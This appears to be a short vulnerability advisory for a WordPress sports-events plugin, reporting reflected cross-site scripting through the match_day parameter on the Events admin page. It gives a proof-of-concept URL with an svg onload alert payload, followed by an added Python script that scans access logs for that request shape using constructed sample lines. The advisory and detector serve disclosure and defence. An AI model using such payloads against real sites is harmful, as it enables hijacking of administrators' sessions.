EPSS Percentile: 43.7%
The plugin does not sanitise and escape its match_day parameter before outputting it back in the Events backend page, leading to a Reflected Cross-Site Scripting issue.
https://example.com/wp-admin/edit.php?post_type=sp_event&match_day="><svg%2Fonload%3Dalert(%2FXSS%2F)%3B><"
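
A log-side check for the request shape above, added here as an example and not part of the original advisory or the plugin's code: it flags requests to the Events backend page whose match_day value decodes to markup characters. The sample log lines are constructed, and the combined access-log format and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Characters that let a reflected value break out of an HTML attribute or tag.
MARKUP = re.compile(r"[<>\"']")
# Request field of a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines: a benign filter, the advisory's request shape
# (percent-encoded as a browser would send it), and a different post type.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-admin/edit.php'
    '?post_type=sp_event&match_day=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:02:11 +0000] "GET /wp-admin/edit.php'
    '?post_type=sp_event&match_day=%22%3E%3Csvg%2Fonload%3Dalert(%2FXSS%2F)'
    '%3B%3E%3C%22 HTTP/1.1" 200 5200',
    '203.0.113.7 - - [01/Jan/2024:10:03:40 +0000] "GET /wp-admin/edit.php'
    '?post_type=post&match_day=%3Cb%3E HTTP/1.1" 200 4800',
]

def suspicious_match_day(target):
    """Return the decoded match_day value if it carries markup, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/edit.php"):
        return None
    query = parse_qs(parts.query, keep_blank_values=True)
    if "sp_event" not in query.get("post_type", []):
        return None
    for raw in query.get("match_day", []):
        # parse_qs decodes once; decode again to catch double-encoded values.
        for value in (raw, unquote(raw)):
            if MARKUP.search(value):
                return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for each matching log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        found = REQUEST.search(line)
        if found:
            value = suspicious_match_day(found.group(1))
            if value is not None:
                hits.append((number, value))
    return hits

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: match_day carries markup: {value!r}")
```

Legitimate match_day values that contain an apostrophe will also be flagged, so treat hits as leads to review against the referring page and the logged-in user's session.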